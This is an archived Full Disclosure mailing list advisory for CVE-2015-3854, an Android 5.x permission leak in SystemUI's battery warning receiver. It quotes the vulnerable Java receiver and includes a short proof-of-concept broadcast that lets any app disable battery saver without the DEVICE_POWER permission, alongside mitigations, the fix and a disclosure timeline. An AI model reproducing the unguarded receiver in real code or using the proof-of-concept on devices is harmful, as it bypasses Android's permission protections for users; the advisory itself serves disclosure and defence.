Full Disclosure mailing list archives
Re: CVE-2015-3854 Battery permission leakage in Android
From: "flanker" <i () flanker017 me>
Date: Thu, 26 May 2016 15:58:49 +0800
The Credit of this vulnerability is to Qidan He (@flanker_hqd) from KeenLab(http://keenlab.tencent.com), Tencent. ------------------ Sincerely Qidan (a.k.a Flanker) ------------------ Original ------------------ From: "flanker"<i () flanker017 me>; Date: Thu, May 26, 2016 03:27 PM To: "fulldisclosure"<fulldisclosure () seclists org>; Subject: CVE-2015-3854 Battery permission leakage in Android Hi: I'm posting some vulnerabilities I reported to Android and fixed last year prior to the Android Security Bounty program launch. Since there're no public bulletins for these ancient reports, I'm writing to the maillist for the record. Details ======= A permission leakage exists in Android 5.x that enables a malicious application to acquire the system-level protected permission of DEVICE_POWER. There exists a permission leakage in packages/SystemUI/src/com/android/systemui/power/PowerNotificationWarnings.java, An attacker app without any permission can turn off battery save mode (which should be guarded by DEVICE_POWER permission, which is a system permission, lead to permission leakage), dismiss low battery notification. ##Analysis The PowerNotificationWarnings registered a dynamic receiver without permission guard, listening for the following actions: - PNW.batterySettings - PNW.startSaver - PNW.stopSaver - PNW.dismissedWarning The PNW.stopSaver will call setSaverMode(false), thus call mPowerMan.setPowerSaveMode(false), which finally calls PowerManager.setPowerSaveMode(false). ```java (code of PowerNotificationWarnings.java) private final class Receiver extends BroadcastReceiver { public void init() { IntentFilter filter = new IntentFilter(); filter.addAction(ACTION_SHOW_BATTERY_SETTINGS); filter.addAction(ACTION_START_SAVER); filter.addAction(ACTION_STOP_SAVER); filter.addAction(ACTION_DISMISSED_WARNING); mContext.registerReceiverAsUser(this, UserHandle.ALL, filter, null, mHandler); } @Override public void onReceive(Context context, Intent intent) { final String action = intent.getAction(); Slog.i(TAG, "Received " + action); if (action.equals(ACTION_SHOW_BATTERY_SETTINGS)) { dismissLowBatteryNotification(); mContext.startActivityAsUser(mOpenBatterySettings, UserHandle.CURRENT); } else if (action.equals(ACTION_START_SAVER)) { dismissLowBatteryNotification(); showStartSaverConfirmation(); } else if (action.equals(ACTION_STOP_SAVER)) { dismissSaverNotification(); dismissLowBatteryNotification(); setSaverMode(false);//PERMISSION LEAK HERE! } else if (action.equals(ACTION_DISMISSED_WARNING)) { dismissLowBatteryWarning(); } } ``` An ordinary app cannot directly call this method because this API call is guarded by system permission DEVICE_POWER, however by sending a broadcast with action "PNW.stopSaver", it can trigger this API call on behave of SystemUI, thus stops battery saver without user action and awareness. Tested on Nexus 6/Nexus 7 (5.1.1) ##POC code(do not require any permission) Intent intent = new Intent(); intent.setAction("PNW.stopSaver"); sendBroadcast(intent); ##Possible mitigations Use a local broadcast mechanism, or use permission to guide the dynamic receiver. ##Official fixes: fixed in https://android.googlesource.com/platform/frameworks/base/+/05e0705177d2078fa9f940ce6df723312cfab976 ##Report timeline 2015.5.6 Initial report to security () android com 2015.5.8 Android Security Team acks and assigned ANDROID-20918350 2015.6.1 The bug is fixed in Android internal branch 2015.7.24 CVE Requested, assigned CVE-2015-3854 2016.5.26 Public Disclosure ------------------ Sincerely Qidan (a.k.a Flanker) _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- CVE-2015-3854 Battery permission leakage in Android flanker (May 26)
- Re: CVE-2015-3854 Battery permission leakage in Android flanker (May 26)